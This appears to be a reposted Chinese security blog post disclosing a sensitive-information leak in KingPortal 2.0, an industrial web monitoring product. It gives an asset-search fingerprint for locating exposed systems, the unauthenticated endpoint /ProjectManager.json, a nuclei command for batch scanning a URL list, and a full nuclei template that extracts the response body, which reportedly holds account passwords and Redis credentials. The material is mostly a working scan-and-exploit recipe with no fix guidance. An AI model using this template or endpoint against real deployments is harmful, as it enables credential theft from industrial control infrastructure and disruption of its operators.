一、漏洞简介
北京亚控科技发展有限公司自主研发的KingPortal是一款纯B/S架构面向工业监控领域的web端组态产品,是大数据可视化与工业互联网技术融合的产物,KingPortal以自动化技术为起点,以信息集成为突破口,以组件为基础进行Web端可视化组态开发,远超传统CS组态软件和其他Web端产品。KingPortal具备高质量Web界面、瘦客户端、跨平台兼容、免安装、低代码等核心技术优势。 KingPortal开发系统存在敏感信息泄露漏洞,攻击者可以通过漏洞访问接口获取系统账号密码、Redis地址及密码等敏感信息,从而影响系统正常运行。
二、影响版本
KingPortal_2.0
三、资产测绘
body="/public/javascripts/Common/Util/km_util.js"
四、漏洞复现
请求接口获取项目信息
/ProjectManager.json
nuclei批量脚本放在文章最后
nuclei.exe -t "C:UsersAdministratorDesktopKingPortal-leaks-ProjectManager.yaml" -l url.txt
nuclei脚本:
https://github.com/ghosinshell/Nuclei-POC/blob/main/%E5%B7%A5%E6%8E%A7%E6%BC%8F%E6%B4%9E/KingPortal/KingPortal-leaks-ProjectManager.yaml
id: KingPortal-leaks-ProjectManager info: name: KingPortal开发系统-信息泄露 author: ghosinshell severity: critical description: KingPortal开发系统-信息泄露(项目信息) tags: KingPortal开发系统, KingPortal, 项目信息泄漏 reference: https://github.com/ghosinshell/Nuclei-POC requests: - method: GET path: - "{{BaseURL}}/ProjectManager.json" matchers: - type: word words: - "projectGroups" - "projectMng" - "projectArray" extractors: - type: regex part: body regex: - "(.*)"
原文始发于微信公众号(菜鸟学渗透):KingPortal开发系统 信息泄露(项目工程信息)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论